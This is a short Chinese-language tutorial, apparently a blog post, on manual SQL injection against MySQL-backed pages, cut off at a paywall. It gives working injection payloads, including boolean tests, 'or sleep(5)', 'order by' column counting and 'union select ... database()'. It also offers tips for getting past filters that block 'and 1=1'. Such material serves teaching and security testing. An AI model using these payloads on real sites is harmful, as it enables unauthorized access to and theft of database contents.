本文详细介绍了SQL注入的原理,包括如何判断注入点、利用联合查询获取数据库信息。通过示例展示了如何通过注入点查询数据库字段、表名以及内容。强调了order by和union select在注入过程中的作用,并提到了利用information_schema获取数据库结构的方法。
SQL注入原理;
用户输入的数字被当作代码执行
在URL栏中进行手注
判断方法:
原始的方法:
and 1=1 //页面正常
and 1=2 //页面不正常 //在被拦截的可能性高
简单的方法:
加’ 看是否报错
我的方法:
如果是数字型传参,可以尝试-1
例如:
http://www.xxx.com/new.php?id=1 页面显示id=1的新闻
http://www.xxx.com/new.php?id=2-1 页面显示id=1的新闻
and 1=1 and 1=2 被拦截的可能性太高了
可以尝试 and -1=-1 and -1=-2 and 1>0 or 1=1
或者直接 or sleep(5)
**
显错注入联合查询的基本流程;
**
是否存在注入点>猜解字段数>联合查询找出输出点>用系统自带库查表名,字段名>查询我们需要的字段
MYSQL
判断当前页面字段总数
and 1=1 order by 1,2,3,4,5……
判断显示位
and 1=2 union select 1,2,3,4,5,6,7……
查当前数据库
and 1=2 union select 1,2,database()
最低0.47元/天 解锁文章
扫一扫
378
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
